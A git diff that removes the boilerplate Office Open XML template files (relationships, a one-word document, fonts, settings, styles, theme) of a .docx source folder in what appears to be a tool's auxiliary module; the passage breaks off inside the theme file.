+0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/document.xml b/modules/auxiliary/docx/sourcedoc/word/document.xml deleted file mode 100644 index 6e291134c2fa..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/document.xml +++ /dev/null @@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00E97639" w:rsidRDefault="00E97639"><w:r><w:t>hoi</w:t></w:r></w:p><w:sectPr w:rsidR="00E97639" w:rsidSect="00B25E88"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/fontTable.xml b/modules/auxiliary/docx/sourcedoc/word/fontTable.xml deleted file mode 100644 index 20e9a398fef8..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/fontTable.xml +++ /dev/null @@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="20002A87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000004B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font></w:fonts> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/settings.xml b/modules/auxiliary/docx/sourcedoc/word/settings.xml deleted file mode 100644 index 4692c237a851..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/settings.xml +++ /dev/null @@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main"><w:zoom w:percent="100"/><w:embedSystemFonts/><w:attachedTemplate r:id="rId1"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:doNotValidateAgainstSchema/><w:doNotDemarcateInvalidXml/><w:compat><w:useNormalStyleForList/><w:doNotUseIndentAsNumberingTabStop/><w:useAltKinsokuLineBreakRules/><w:allowSpaceOfSameStyleInTable/><w:doNotSuppressIndentation/><w:doNotAutofitConstrainedTables/><w:autofitToFirstFixedWidthCell/><w:underlineTabInNumList/><w:displayHangulFixedWidth/><w:splitPgBreakAndParaMark/><w:doNotVertAlignCellWithSp/><w:doNotBreakConstrainedForcedTable/><w:doNotVertAlignInTxbx/><w:useAnsiKerningPairs/><w:cachedColBalance/></w:compat><w:rsids><w:rsidRoot w:val="00B25E88"/><w:rsid w:val="00890656"/><w:rsid w:val="00B25E88"/><w:rsid w:val="00E97639"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="off"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:uiCompat97To2003/><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:doNotIncludeSubdocsInStats/><w:doNotAutoCompressPictures/><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/styles.xml b/modules/auxiliary/docx/sourcedoc/word/styles.xml deleted file mode 100644 index 4a084626fc28..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/styles.xml +++ /dev/null @@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:docDefaults><w:rPrDefault><w:rPr><w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/><w:sz w:val="22"/><w:szCs w:val="22"/><w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/></w:rPr></w:rPrDefault><w:pPrDefault/></w:docDefaults><w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267"><w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="toc 1" w:uiPriority="39"/><w:lsdException w:name="toc 2" w:uiPriority="39"/><w:lsdException w:name="toc 3" w:uiPriority="39"/><w:lsdException w:name="toc 4" w:uiPriority="39"/><w:lsdException w:name="toc 5" w:uiPriority="39"/><w:lsdException w:name="toc 6" w:uiPriority="39"/><w:lsdException w:name="toc 7" w:uiPriority="39"/><w:lsdException w:name="toc 8" w:uiPriority="39"/><w:lsdException w:name="toc 9" w:uiPriority="39"/><w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/><w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/><w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/><w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/><w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Revision" w:unhideWhenUsed="0"/><w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Bibliography" w:uiPriority="37"/><w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/></w:latentStyles><w:style w:type="paragraph" w:default="1" w:styleId="Normal"><w:name w:val="Normal"/><w:qFormat/><w:rsid w:val="00B25E88"/><w:rPr><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:style><w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont"><w:name w:val="Default Paragraph Font"/><w:uiPriority w:val="99"/><w:semiHidden/></w:style><w:style w:type="table" w:default="1" w:styleId="TableNormal"><w:name w:val="Normal Table"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/><w:qFormat/><w:tblPr><w:tblInd w:w="0" w:type="dxa"/><w:tblCellMar><w:top w:w="0" w:type="dxa"/><w:left w:w="108" w:type="dxa"/><w:bottom w:w="0" w:type="dxa"/><w:right w:w="108" w:type="dxa"/></w:tblCellMar></w:tblPr></w:style><w:style w:type="numbering" w:default="1" w:styleId="NoList"><w:name w:val="No List"/><w:uiPriority w:val="99"/><w:semiHidden/><w:unhideWhenUsed/></w:style></w:styles> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml b/modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml deleted file mode 100644 index a06c80529b6c..000000000000 --- a/modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml +++ /dev/null @@ -1,2 +0,0 @@ -<?xml version="1.0" encoding="UTF-8" standalone="yes"?> -<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme"><a:themeElements><a:clrScheme name="Office"><a:dk1><a:sysClr val="windowText" lastClr="000000"/></a:dk1><a:lt1><a:sysClr val="window" lastClr="FFFFFF"/></a:lt1><a:dk2><a:srgbClr val="1F497D"/></a:dk2><a:lt2><a:srgbClr val="EEECE1"/></a:lt2><a:accent1><a:srgbClr val="4F81BD"/></a:accent1><a:accent2><a:srgbClr val="C0504D"/></a:accent2><a:accent3><a:srgbClr val="9BBB59"/></a:accent3><a:accent4><a:srgbClr val="8064A2"/></a:accent4><a:accent5><a:srgbClr val="4BACC6"/></a:accent5><a:accent6><a:srgbClr val="F79646"/></a:accent6><a:hlink><a:srgbClr val="0000FF"/></a:hlink><a:folHlink><a:srgbClr val="800080"/></a:folHlink></a:clrScheme><a:fontScheme name="Office"><a:majorFont><a:latin typeface="Cambria"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="MS ゴシック"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Times New Roman"/><a:font script="Hebr" typeface="Times New Roman"/><a:font script="Thai" typeface="Angsana New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="MoolBoran"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Times New Roman"/><a:font script="Uigh" typeface="Microsoft Uighur"/></a:majorFont><a:minorFont><a:latin typeface="Calibri"/><a:ea typeface=""/><a:cs typeface=""/><a:font script="Jpan" typeface="MS 明朝"/><a:font script="Hang" typeface="맑은 고딕"/><a:font script="Hans" typeface="宋体"/><a:font script="Hant" typeface="新細明體"/><a:font script="Arab" typeface="Arial"/><a:font script="Hebr" typeface="Arial"/><a:font script="Thai" typeface="Cordia New"/><a:font script="Ethi" typeface="Nyala"/><a:font script="Beng" typeface="Vrinda"/><a:font script="Gujr" typeface="Shruti"/><a:font script="Khmr" typeface="DaunPenh"/><a:font script="Knda" typeface="Tunga"/><a:font script="Guru" typeface="Raavi"/><a:font script="Cans" typeface="Euphemia"/><a:font script="Cher" typeface="Plantagenet Cherokee"/><a:font script="Yiii" typeface="Microsoft Yi Baiti"/><a:font script="Tibt" typeface="Microsoft Himalaya"/><a:font script="Thaa" typeface="MV Boli"/><a:font script="Deva" typeface="Mangal"/><a:font script="Telu" typeface="Gautami"/><a:font script="Taml" typeface="Latha"/><a:font script="Syrc" typeface="Estrangelo Edessa"/><a:font script="Orya" typeface="Kalinga"/><a:font script="Mlym" typeface="Kartika"/><a:font script="Laoo" typeface="DokChampa"/><a:font script="Sinh" typeface="Iskoola Pota"/><a:font script="Mong" typeface="Mongolian Baiti"/><a:font script="Viet" typeface="Arial"/><a:font script="Uigh" typeface="Microsoft Uighur"/></a:minorFont></a:fontScheme><a:fmtScheme name="Office"><a:fillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="50000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="35000"><a:schemeClr val="phClr"><a:tint val="37000"/><a:satMod val="300000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:tint val="15000"/><a:satMod val="350000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="1"/></a:gradFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:shade val="51000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="80000"><a:schemeClr val="phClr"><a:shade val="93000"/><a:satMod val="130000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr val="phClr"><a:shade val="94000"/><a:satMod val="135000"/></a:schemeClr></a:gs></a:gsLst><a:lin ang="16200000" scaled="0"/></a:gradFill></a:fillStyleLst><a:lnStyleLst><a:ln w="9525" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"><a:shade val="95000"/><a:satMod val="105000"/></a:schemeClr></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="25400" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln><a:ln w="38100" cap="flat" cmpd="sng" algn="ctr"><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:prstDash val="solid"/></a:ln></a:lnStyleLst><a:effectStyleLst><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="38000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst></a:effectStyle><a:effectStyle><a:effectLst><a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0"><a:srgbClr val="000000"><a:alpha val="35000"/></a:srgbClr></a:outerShdw></a:effectLst><a:scene3d><a:camera prst="orthographicFront"><a:rot lat="0" lon="0" rev="0"/></a:camera><a:lightRig rig="threePt" dir="t"><a:rot lat="0" lon="0" rev="1200000"/></a:lightRig></a:scene3d><a:sp3d><a:bevelT w="63500" h="25400"/></a:sp3d></a:effectStyle></a:effectStyleLst><a:bgFillStyleLst><a:solidFill><a:schemeClr val="phClr"/></a:solidFill><a:gradFill rotWithShape="1"><a:gsLst><a:gs pos="0"><a:schemeClr val="phClr"><a:tint val="40000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="40000"><a:schemeClr val="phClr"><a:tint val="45000"/><a:shade val="99000"/><a:satMod val="350000"/></a:schemeClr></a:gs><a:gs pos="100000"><a:schemeClr 